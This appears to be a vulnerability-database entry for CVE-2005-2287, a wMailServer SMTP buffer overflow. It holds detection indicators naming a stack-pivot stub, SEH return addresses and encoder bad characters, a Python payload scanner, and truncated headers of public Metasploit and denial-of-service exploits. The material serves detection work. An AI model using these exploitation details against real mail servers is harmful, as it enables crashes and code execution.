CVE-2005-2287
Published: 2005-07-18
Priority: P4 | 29 | medium | 5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT | EPSS: 56.83% (98.9th percentile)
SoftiaCom wMailServer 1.0 and 2.0 allows remote attackers to cause a denial of service (application crash) via a large TCP packet with a leading space, possibly triggering a buffer overflow.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softiacom | wmailserver | — | — |
| softiacom | wmailserver | — | — |
Detection & IOCs (extracted from sources)
Bytes: \x81\xc4\xff\xef\xff\xff\x44
Bytes: \xeb\x06
- Exploit targets SMTP port 25 with a large buffer beginning with a leading space character, followed by ~5115+ bytes of filler, then a SEH overwrite payload, terminated with \r\n\r\n. Detect oversized SMTP banner/greeting-stage TCP payloads with a leading space on port 25.
- The exploit prepends a stack-pivot stub \x81\xc4\xff\xef\xff\xff\x44 before the encoded payload. Presence of this byte sequence in SMTP traffic on port 25 is a strong indicator of exploitation.
- The DoS exploit sends a raw buffer of ~539 bytes of 0x41 ('A') characters directly to TCP port 25 without any SMTP command prefix. Monitor for non-SMTP-conformant large payloads of repeated 0x41 bytes on port 25.
- SEH overwrite exploit uses a short JMP (\xeb\x06) followed by a packed return address. Detect this 6-byte pattern (EB 06 + 4-byte address) within large SMTP payloads as a SEH chain overwrite indicator.
- Known SEH overwrite return addresses used in exploitation: 0x75022ac4 (Windows 2000), 0x71aa32ad (Windows XP SP0/SP1), 0x776a1799 (Windows NT 4.0). Flag SMTP payloads containing these 4-byte little-endian values.
- Bad characters filtered by the exploit encoder are \x00\x0a\x0d\x20 (null, LF, CR, space) plus colon, equals, plus, and double-quote in the older module. Encoded shellcode in exploit traffic will not contain these bytes.
- The Metasploit module targets only Windows platforms (win32, winnt, win2000, winxp). The exploit is not applicable to non-Windows deployments of wMailServer.
- Payload space is limited to 600 bytes due to buffer constraints; shellcode must fit within this space after encoding.
- The exploit uses EXITFUNC=thread, meaning the shellcode exits via thread termination rather than process exit, which may affect post-exploitation stability and detection via process monitoring.
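The indicators listed above, combined into one check over a client-to-server payload on port 25, as an added example (not code from this page or from the exploit sources). The function name, the two thresholds and the sample byte strings are assumptions constructed for illustration.

```python
import re

# Byte indicators quoted in the list above.
STACK_STUB = bytes.fromhex("81c4ffefffff44")
SEH_RETURNS = {0x75022AC4: "Windows 2000",
               0x71AA32AD: "Windows XP SP0/SP1",
               0x776A1799: "Windows NT 4.0"}
SHORT_JMP = re.compile(rb"\xeb\x06(.{4})", re.DOTALL)

# Assumed thresholds (not from the page): RFC 5321 caps a command line at
# 512 octets; 500 sits just under the ~539-byte 0x41 buffer described above.
MAX_LINE = 512
MIN_A_RUN = 500


def scan_smtp_payload(payload: bytes) -> list[str]:
    """Return indicator names matched in one client-to-server TCP payload."""
    hits = []
    oversized = len(payload.split(b"\r\n", 1)[0]) > MAX_LINE
    if oversized and payload.startswith(b" "):
        hits.append("oversized-line-leading-space")
    if payload.startswith(b"A" * MIN_A_RUN):
        hits.append("repeated-0x41-no-command")
    if STACK_STUB in payload:
        hits.append("stack-pivot-stub")
    for match in SHORT_JMP.finditer(payload):
        addr = int.from_bytes(match.group(1), "little")
        if addr in SEH_RETURNS:
            hits.append(f"seh-return:{SEH_RETURNS[addr]}")
        elif oversized and "short-jmp-in-oversized-line" not in hits:
            hits.append("short-jmp-in-oversized-line")
    return hits


# Constructed test vectors: indicator bytes in inert filler, not captures.
SAMPLES = {
    "normal": b"EHLO mail.example.org\r\n",
    "leading_space": b" " + b"x" * 600 + b"\r\n\r\n",
    "a_run": b"A" * 539,
    "stub": b"MAIL FROM:<a@example.org> " + STACK_STUB + b"\r\n",
    "seh": b" " + b"x" * 600 + b"\xeb\x06"
           + (0x71AA32AD).to_bytes(4, "little") + b"\r\n\r\n",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:14} {scan_smtp_payload(data)}")
```

The known return addresses are reported on their own; a bare EB 06 is only reported inside an oversized first line, since two bytes alone match too much benign traffic.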
No detection rules found.
Exploit-DB
SoftiaCom wMailServer 1.0 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
---
##
# $Id: wmailserver.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SoftiaCom WMailserver 1.0 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0
(SMTP) via a SEH frame overwrite.
},
'Author' => [ 'MC' ],
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2005-2287' ],
[ 'OSVDB', '17883' ],
[ 'BID', '14213' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Pl
Exploit-DB
SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)
exploitdb·2006-02-01
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wmailserver_smtp;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp' ],
'Priv' => 0,
'UserOpts' =
Exploit-DB
SoftiaCom wMailServer 1.0 - Remote Denial of Service
exploitdb·2005-07-12
---
/*****************************************************************
wMailServer Remote D.o.S Exploit by Kozan
Application: wMailServer
Vendor: Softiacom Software - www.softiacom.com
Discovered by: fRoGGz - SecuBox Labs
Exploit Coded by: Kozan
Credits to ATmaCA, fRoGGz, SecuBox Labs
Web: www.spyinstructors.com
Mail: [email protected]
*****************************************************************/
#include
#include
#include
#pragma comment(lib,"ws2_32.lib")
char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\
Metasploit
SoftiaCom WMailserver 1.0 Buffer Overflow
metasploit
This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.
No writeups or analysis indexed.
Published: 2005-07-18